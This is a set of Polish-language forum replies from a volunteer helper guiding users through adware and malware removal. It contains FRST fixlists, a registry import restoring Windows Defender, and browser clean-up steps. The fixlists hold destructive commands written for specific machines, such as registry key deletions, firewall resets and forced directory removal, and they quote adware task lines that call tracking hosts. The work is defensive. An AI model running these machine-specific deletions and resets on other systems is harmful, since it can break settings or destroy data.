Wymagane poprawki, bo adware nie zostało usunięte - nadal w systemie aktywne usługi / sterownik adware WordAnchor 1.10.0.19 z grupy Vitruvian oraz polityki Google. I jeszcze dodam, że WordAnchor 1.10.0.19 nabyłeś z serwisu dobreprogramy.pl przy udziale śmiecia "Asystent pobierania": KLIK. Na dysku widać poniższy plik "Asystenta" i zaraz po nim utworzone komponenty adware: C:\Users\user\Downloads\Photostage-Slideshow(17952)-dp.exe Akcje do wdrożenia: 1. Przez Panel sterowania odinstaluj adware WordAnchor 1.10.0.19. Przy okazji, pozbądź się także starych niezbezpiecznych wersji (luki): Adobe Flash Player 10 ActiveX, Adobe Reader 9.1.2 - Polish, Java™ 6 Update 18, Java 7 Update 11, OpenOffice.org 3.2 oraz zbędnego Spybot - Search & Destroy. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKU\S-1-5-21-356970189-196760685-2834952327-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com U5 AppMgmt; C:\Windows\system32\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S3 catchme; \??\C:\Users\user\AppData\Local\Temp\catchme.sys [X] FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 FF HKU\S-1-5-21-356970189-196760685-2834952327-1000\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 C:\Users\user\Downloads\*(*)-dp*.exe Reg: reg delete HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I /f Reg: reg delete HKCU\Software\dobreprogramy /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. menu Historia > Wyczyść historię przeglądania 4. Wyczyść Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Ustawienia > Osoby > usuń wszystkie profile i utwórz nowy Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 5. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Infekcji tu było kilka - jedna z nich nie została usunięta, nadal w starcie jest wpis malware msqoer.exe odpowiadający za tworzenie takich obiektów na pendrive. Apropos tej części instrukcji: Te foldery nie miały widocznej nazwy, ich nazwa to "spacja" (wizualnie "bez nazwy") a nie "Removable Drive". Foldery te nadal są na wszystkich urządzeniach i to w formie ukrytej: [28/05/2015 - 09:11:38 | SHD] - H:\ [23/06/2015 - 21:38:06 | SHD] - I:\ [17/06/2015 - 13:40:34 | SHD] - J:\ Kolejne akcje: 1. Zakładam, że dyski H, I, J są mapowane pod tymi samymi literami. Otwórz Notatnik i wklej w nim: CloseProcesses: HKLM\...\Policies\Explorer\Run: [1817807662] => C:\ProgramData\msqoer.exe [100130816 2010-11-21] (Redtail Technology) HKLM\...\Run: [Nvtmru] => "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe" CHR HKU\S-1-5-21-2773447309-4165682760-850709354-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fnelgfmpooffemibikhmcklfnnimgijo] - C:\Users\Piotr\AppData\Local\CRE\fnelgfmpooffemibikhmcklfnnimgijo.crx [2014-04-01] CHR HKLM-x32\...\Chrome\Extension: [fnelgfmpooffemibikhmcklfnnimgijo] - C:\Users\Piotr\AppData\Local\CRE\fnelgfmpooffemibikhmcklfnnimgijo.crx [2014-04-01] C:\Program Files\DSHJYB1M.exe C:\Program Files (x86)\is.dat C:\Program Files (x86)\uik.dat C:\ProgramData\msivxdc.exe C:\ProgramData\msqoer.exe C:\Users\Piotr\AppData\Local\CRE RemoveDirectory: J:\Autorun.inf CMD: attrib /d /s -s -h H:\* CMD: attrib /d /s -s -h I:\* CMD: attrib /d /s -s -h J:\* CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Po wyżej wymienionej akcji wejdź na dyski H, I, J - z folderów "bez nazwy" przenieś wszystkie dane poziom wyżej, a foldery te skasuj. 3. Jedna z infekcji skasowała usługę Windows Defender. Otwórz Notatnik i wklej w nim: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend] "DisplayName"="@%ProgramFiles%\\Windows Defender\\MsMpRes.dll,-103" "ErrorControl"=dword:00000001 "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\ 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\ 6b,00,20,00,73,00,65,00,63,00,73,00,76,00,63,00,73,00,00,00 "Start"=dword:00000002 "Type"=dword:00000020 "Description"="@%ProgramFiles%\\Windows Defender\\MsMpRes.dll,-1176" "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00 "ObjectName"="LocalSystem" "ServiceSidType"=dword:00000001 "RequiredPrivileges"=hex(7):53,00,65,00,49,00,6d,00,70,00,65,00,72,00,73,00,6f,\ 00,6e,00,61,00,74,00,65,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,\ 65,00,00,00,53,00,65,00,42,00,61,00,63,00,6b,00,75,00,70,00,50,00,72,00,69,\ 00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,52,00,65,00,73,00,\ 74,00,6f,00,72,00,65,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,\ 00,00,00,53,00,65,00,44,00,65,00,62,00,75,00,67,00,50,00,72,00,69,00,76,00,\ 69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,43,00,68,00,61,00,6e,00,67,\ 00,65,00,4e,00,6f,00,74,00,69,00,66,00,79,00,50,00,72,00,69,00,76,00,69,00,\ 6c,00,65,00,67,00,65,00,00,00,53,00,65,00,53,00,65,00,63,00,75,00,72,00,69,\ 00,74,00,79,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,\ 53,00,65,00,53,00,68,00,75,00,74,00,64,00,6f,00,77,00,6e,00,50,00,72,00,69,\ 00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,49,00,6e,00,63,00,\ 72,00,65,00,61,00,73,00,65,00,51,00,75,00,6f,00,74,00,61,00,50,00,72,00,69,\ 00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,41,00,73,00,73,00,\ 69,00,67,00,6e,00,50,00,72,00,69,00,6d,00,61,00,72,00,79,00,54,00,6f,00,6b,\ 00,65,00,6e,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,\ 00,00 "DelayedAutoStart"=dword:00000001 "FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ 00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00,00,00,00,00,00,00,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend\Parameters] "ServiceDllUnloadOnStop"=dword:00000001 "ServiceDll"=hex(2):25,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,46,00,69,\ 00,6c,00,65,00,73,00,25,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,00,\ 20,00,44,00,65,00,66,00,65,00,6e,00,64,00,65,00,72,00,5c,00,6d,00,70,00,73,\ 00,76,00,63,00,2e,00,64,00,6c,00,6c,00,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend\Security] "Security"=hex:01,00,14,80,dc,00,00,00,e8,00,00,00,14,00,00,00,30,00,00,00,02,\ 00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\ 00,00,02,00,ac,00,06,00,00,00,00,00,28,00,ff,01,0f,00,01,06,00,00,00,00,00,\ 05,50,00,00,00,b5,89,fb,38,19,84,c2,cb,5c,6c,23,6d,57,00,77,6e,c0,02,64,87,\ 00,0b,28,00,00,00,00,10,01,06,00,00,00,00,00,05,50,00,00,00,b5,89,fb,38,19,\ 84,c2,cb,5c,6c,23,6d,57,00,77,6e,c0,02,64,87,00,00,14,00,fd,01,02,00,01,01,\ 00,00,00,00,00,05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,\ 05,20,00,00,00,20,02,00,00,00,00,14,00,9d,01,02,00,01,01,00,00,00,00,00,05,\ 04,00,00,00,00,00,14,00,9d,01,02,00,01,01,00,00,00,00,00,05,06,00,00,00,01,\ 01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend\TriggerInfo] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinDefend\TriggerInfo\0] "Type"=dword:00000005 "Action"=dword:00000001 "GUID"=hex:e6,ca,9f,65,db,5b,a9,4d,b1,ff,ca,2a,17,8d,46,e0 Z menu Notatnika > Plik > Zapisz jako > Ustaw rozszerzenie na Wszystkie pliki > Zapisz jako FIX.REG Kliknij prawym na plik i z menu wybierz opcję Scal. Potwierdź import do rejestru. Zresetuj system. 4. Przywracanie systemu jest wyłączone: ==================== Restore Points ========================= ATTENTION: System Restore is disabled Wejdź do Panelu sterowania do sekcji Przywracania systemu i włącz Ochronę dla dysku C. 5. Zrób nowe logi: FRST z opcji Scan (bez Addition i Shortcut), Farbar Service Scanner oraz USBFix z opcji Listing. Dołącz też plik fixlog.txt.

Nic tu nie wskazuje na problem infekcji jako przyczyny tych zachowań. Pierwszy podejrzany z raportów to Kaspersky Internet Security. Na próbę go odinstaluj i podaj czy są jakieś widoczne zmiany w systemie. Jaki rodzaj reklam? Podaj dokładną ścieżkę dostępu do tego wadliwego pliku.

Nie wiem o co chodzi z tymi nieznajdowalnymi raportami. I wg raportu FRST wszystko wygląda na wykonane, aczkolwiek FRST tak jakby jeszcze nie dokończył zadań - figuruje wpis RunOnce relatywny do komendy EmptyTemp:. Pojawiły się też nowe dziwactwa takie jak zablokowanie usługi systemowej BFE oraz błędy WMI - prawdopodobnie to jest robota COMODO. Poprawki: 1. Otwórz Notatnik i wklej w nim: HKLM\...\RunOnce: [*EmptyTemp] => cmd /c rd /q/s C:\FRST\Temp Task: {0E87F5FE-3447-47E9-9C07-73A12B403A57} - No Task path Task: {177C1D35-E057-435F-B082-2BAC888EFF31} - No Task path RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\Adam\AppData\Local\Temp RemoveDirectory: C:\Users\Adam\Desktop\Stare dane programu Firefox Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Wyłącz COMODO. Uruchom FRST i kliknij w Fix. Przedstaw wynikowy fixlog.txt. 2. Uruchom AdwCleaner. Zastosuj Szukaj, a po tym Usuń. Przedstaw raport z usuwania z folderu C:\AdwCleaner. Wypowiedz się czy w którejś z przeglądarek nadal występuje problem adware.

Przeprowadź jeszcze działania "kosmetyczne". Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CMD: ipconfig /flushdns Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f S3 HTCAND32; System32\Drivers\ANDROIDUSB.sys [X] C:\Documents and Settings\All Users\FastPics.log C:\Documents and Settings\All Users\UpdaterLog.txt EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw ten log.

Jaki błąd zwraca próba włączenia Zapory (rozumiem, że mowa o systemowej)?

W poprzednim logu było widać, że fixlist siedzi niby w tym samym katalogu z którego działa FRST, ale sam fakt jego obecności świadczy że nie wykonał się Fix (Fixlist samoczynnie znika po udanej akcji): Running from C:\Users\Adam\Downloads ==================== One Month Created files and folders ======== 2015-06-26 23:06 - 2015-06-26 23:06 - 00006573 _____ C:\Users\Adam\Downloads\fixlist.txt Czy aktualnie FRST jest uruchamiany z C:\Users\Adam\Downloads? Jeśli nastąpił restart, to coś się wykonało. Zrób nowe raporty FRST (włącznie z Addition).

Brak Fixlog = nie wykonane zadanie, nie uruchomiono skryptu. Powtarzaj zadane kroki 2-6.

Usuwam z Twojego posta adresy a.akamaihd.net dodane przez aktywne malware. Akcje do przeprowadzenia: 1. Przez Panel sterowania odinstaluj adware Radio Canyon. Jeśli nie będzie ten wpis widoczny lub proces zwróci błąd, i tak zajmie się tym poniższy skrypt. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: S2 globalUpdate; C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe [68608 2014-10-16] (globalUpdate) [File not signed] S3 globalUpdatem; C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe [68608 2014-10-16] (globalUpdate) [File not signed] Task: {0525CBFE-0670-48F0-ADE0-94734D97F55A} - System32\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-1 => C:\Program Files (x86)\Radio Canyon\Radio Canyon-codedownloader.exe Task: {1D01A273-B209-425D-8224-875024C71F2C} - System32\Tasks\mega_shop_helper_service => C:\Program Files (x86)\Mega Shop\mega_shop_helper_service.exe [2015-05-29] () Task: {241FB934-320A-4A99-B22F-9F9629F1C697} - System32\Tasks\globalUpdateUpdateTaskMachineUA => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe [2014-10-16] (globalUpdate) Task: {4B6064C0-2377-4828-8ED0-168FFAB01C90} - System32\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-2 => C:\Program Files (x86)\Radio Canyon\938419c4-1f97-4354-b67b-15660575ebdb-2.exe Task: {53770E2F-4060-40E0-B422-D30AF1AD59B6} - System32\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-5 => C:\Program Files (x86)\Radio Canyon\938419c4-1f97-4354-b67b-15660575ebdb-5.exe Task: {577A17B3-BEC3-411B-B90A-0FC8DA2705DC} - System32\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-4 => C:\Program Files (x86)\Radio Canyon\938419c4-1f97-4354-b67b-15660575ebdb-4.exe Task: {89A48B0C-EBAE-480E-92B7-11472FDEA4E2} - System32\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-11 => C:\Program Files (x86)\Radio Canyon\938419c4-1f97-4354-b67b-15660575ebdb-11.exe Task: {8A2C9C67-8343-472B-94D9-61E2D795F95B} - System32\Tasks\globalUpdateUpdateTaskMachineCore => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe [2014-10-16] (globalUpdate) Task: {992692C0-AA80-4427-9F7A-5B245F7AAEFC} - System32\Tasks\summer_games_notification_service => C:\Program Files (x86)\summer games\summer_games_notification_service.exe Task: {AB371284-BDA3-4581-95E1-14CB09BDCFFE} - System32\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-6 => C:\Program Files (x86)\Radio Canyon\938419c4-1f97-4354-b67b-15660575ebdb-6.exe Task: {CA755DA5-9663-4F79-B7BB-130275BA85A1} - System32\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-7 => C:\Program Files (x86)\Radio Canyon\938419c4-1f97-4354-b67b-15660575ebdb-7.exe Task: {CC25100C-CCA1-4750-9EDA-B6A504EECC25} - System32\Tasks\summer_games_updating_service => C:\Program Files (x86)\summer games\summer_games_updating_service.exe Task: {F47267E0-6028-4585-93A5-37CD01101483} - System32\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-5_user => C:\Program Files (x86)\Radio Canyon\938419c4-1f97-4354-b67b-15660575ebdb-5.exe Task: C:\Windows\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-1.job => C:\Program Files (x86)\Radio Canyon\Radio Canyon-codedownloader.exe Task: C:\Windows\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-11.job => C:\Program Files (x86)\Radio Canyon\938419c4-1f97-4354-b67b-15660575ebdb-11.exe Task: C:\Windows\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-2.job => C:\Program Files (x86)\Radio Canyon\938419c4-1f97-4354-b67b-15660575ebdb-2.exe Task: C:\Windows\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-4.job => C:\Program Files (x86)\Radio Canyon\938419c4-1f97-4354-b67b-15660575ebdb-4.exe Task: C:\Windows\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-5.job => C:\Program Files (x86)\Radio Canyon\938419c4-1f97-4354-b67b-15660575ebdb-5.exe Task: C:\Windows\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-5_user.job => C:\Program Files (x86)\Radio Canyon\938419c4-1f97-4354-b67b-15660575ebdb-5.exe Task: C:\Windows\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-6.job => C:\Program Files (x86)\Radio Canyon\938419c4-1f97-4354-b67b-15660575ebdb-6.exe Task: C:\Windows\Tasks\938419c4-1f97-4354-b67b-15660575ebdb-7.job => C:\Program Files (x86)\Radio Canyon\938419c4-1f97-4354-b67b-15660575ebdb-7.exe Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\mega_shop_helper_service.job => C:\Program Files (x86)\Mega Shop\mega_shop_helper_service.exe Task: C:\Windows\Tasks\summer_games_notification_service.job => C:\Program Files (x86)\summer games\summer_games_notification_service.exeč/url='http:/cdn.selectbestopt.com/notf_sys/index.html' /crregname='summer games' /appid='73143' /srcid='2913' /bic='6cfdb1f8d65d52b4fb07dd12e4db3dbe' /verifier='6226c1b668116e9f84a7ac3d1c582728' /installerversion='1.50.3.10' /statsdomain='http:/stats.buildomserv.com/data.gif?' /errorsdomain='http:/stats.buildomserv.com/data.gif?' /monetizationdomain='http:/logs.buildomserv.com/monetization.gif Task: C:\Windows\Tasks\summer_games_updating_service.job => C:\Program Files (x86)\summer games\summer_games_updating_service.exe­ /campid=2913 /verid=1 /url=http:/cdn.buildomserv.com/txt/@CAMPID@/@VER@/file.txt /appid=73143 /taskname=summer_games_updating_service /funurl=http:/stats.buildomserv.com BHO: Radio Canyon -> {11111111-1111-1111-1111-110611081104} -> C:\Program Files (x86)\Radio Canyon\Radio Canyon-bho64.dll No File BHO-x32: Radio Canyon -> {11111111-1111-1111-1111-110611081104} -> C:\Program Files (x86)\Radio Canyon\Radio Canyon-bho.dll No File FF Plugin-x32: @staging.google.com/globalUpdate Update;version=10 -> C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll [2014-10-16] (globalUpdate) FF Plugin-x32: @staging.google.com/globalUpdate Update;version=4 -> C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll [2014-10-16] (globalUpdate) FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\my.cfg [2015-06-05] C:\Program Files (x86)\Mozilla Firefox\browser\defaults C:\Program Files (x86)\globalUpdate C:\Program Files (x86)\Mega Shop C:\Program Files (x86)\Radio Canyon C:\Program Files (x86)\summer games C:\Users\Adam\AppData\Local\globalUpdate C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Preferences DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Radio Canyon EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Wyłącz COMODO, gdyż zablokuje FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. menu Historia > Wyczyść historię przeglądania 4. Wyczyść Google Chrome z adware: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj ddehdnnhjimbggeeenghijehnpakijod, fjefgkhmchopegjeicnblodnidbammed, ghnomdcacenbmilgjigehppbamfndblo, Mega Shop, summer games Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 5. Wyczyść Operę z adware: CTRL+SHIFT+E i z listy rozszerzeń za pomocą iksa odinstaluj adware: ddehdnnhjimbggeeenghijehnpakijod, fjefgkhmchopegjeicnblodnidbammed, ghnomdcacenbmilgjigehppbamfndblo, Mega Shop, summer games, Radio Canyon. 6. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt. Wypowiedz się czy problemy ustąpiły.

Wszystko zostało pomyślnie usunięte. Działania końcowe: 1. Zastosuj DelFix (GMER dokasuj ręcznie), następnie wyczyść foldery Przywracania systemu: KLIK. 2. W związku z tym, że nie wiem co ta infekcja ma konkretnie na celu, poza ewentualnym doładowaniem innych form malware, na wszelki wypadek pozmieniaj wszystkie ważne loginy (bank, poczta, etc.)

jessika Te polityki Safer nie są powiązane z żadnym adware tylko z inną infekcją. AdwCleaner w ogóle nie usuwa tych polityk. - Oba elementy to niepożądane instalacje typu PUP. O MediaGet2: KLIK. - Nie wszystko też co jest niepożądane jest flagowane przez FRST - FileViewPro nie był po prostu zgłoszony do detekcji. Wpisy typu "ATTENTION" (podpowiedzi dla mniej zaawansowanych lub nieuważnych pomocników) to jest praca grupowa, pomocnicy (w tym i ja) zgłaszają do bazy FRST programy. Jest oczywistym, że zanim ktoś to zgłosi w logu nie ma żadnych podpowiedzi. nonsens Ten J:\explorer.exe to jest wpis pozostawiony po infekcji z pendrive. Są tu do wykonania także inne działania na szczątki adware (m.in. dokasowanie fałszywych profilów Comodo i Google utworzonych przez adware Multiplug we wszystkich folderach kont, nawet tych które są wbudowane w system) oraz dodatkowe korekty. 1. Otwórz Notatnik i wklej w nim: SearchScopes: HKLM -> {BE28C22E-F666-424d-B5FD-125C4AFEE34E} URL = http://search.myheritage.com?orig=ds&q={searchTerms} SearchScopes: HKU\S-1-5-21-1343024091-1450960922-725345543-1004 -> {BE28C22E-F666-424d-B5FD-125C4AFEE34E} URL = http://search.myheritage.com?orig=ds&q={searchTerms} FF Plugin: @divx.com/DivX Player Plugin,version=1.0.0 -> C:\Program Files\DivX\DivX Player\npDivxPlayerPlugin.dll No File FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF HKLM\...\Firefox\Extensions: [fbphotozoom@installdaddy.com] - C:\Program Files\fbphotozoom\fbphotozoom13.xpi DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.7.0/jinstall-1_7_0_45-windows-i586.cab DPF: {CAFEEFAC-0017-0000-0045-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_45-windows-i586.cab DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_45-windows-i586.cab DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab C:\Documents and Settings\Administrator\Ustawienia lokalne\Dane aplikacji\Comodo C:\Documents and Settings\Administrator\Ustawienia lokalne\Dane aplikacji\Google C:\Documents and Settings\ASPNET\Ustawienia lokalne\Dane aplikacji\Comodo C:\Documents and Settings\ASPNET\Ustawienia lokalne\Dane aplikacji\Google C:\Documents and Settings\Gość\Ustawienia lokalne\Dane aplikacji\Comodo C:\Documents and Settings\Gość\Ustawienia lokalne\Dane aplikacji\Google C:\Documents and Settings\Pomocnik\Ustawienia lokalne\Dane aplikacji\Comodo C:\Documents and Settings\Pomocnik\Ustawienia lokalne\Dane aplikacji\Google C:\Documents and Settings\Radek\Ustawienia lokalne\Dane aplikacji\setup.exe C:\Documents and Settings\Radek\Ustawienia lokalne\Dane aplikacji\Comodo C:\Documents and Settings\Radek\Ustawienia lokalne\Dane aplikacji\Google\Chrome SxS C:\Documents and Settings\SUPPORT_388945a0\Ustawienia lokalne\Dane aplikacji\Comodo C:\Documents and Settings\SUPPORT_388945a0\Ustawienia lokalne\Dane aplikacji\Google C:\Program Files\mozilla firefox\plugins C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f CMD: netsh firewall reset Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Nadal w raporcie widać pasek typu adware/PUP "Family Toolbar" wprowadzony przez MyHeritage Family Tree Builder. Odinstaluj ten program w całości. Po deinstalacji sprawdź czy zniknął folder C:\Program Files\Family Toolbar - jeśli nie, wejdź do środka i sprawdź czy nie ma powiązanego deinstalatora. 3. Google Chrome było tu czyszczone w siłowy sposób niezgodny z technikami Google Chrome. Wykonaj jeszcze te akcje: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 4. W Firefox: menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. menu Historia > Wyczyść historię przeglądania 5. Zainstaluj Internet Explorer 8: KLIK. 6. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

To pokaż to zrzuty ekranu, mam nadzieję, że na nich widać pełne ścieżki dostępu do wykrytych obiektów malware. A nie jest to aby C:\Users\wangzhisong? Przepisz nazwę dokładnie.

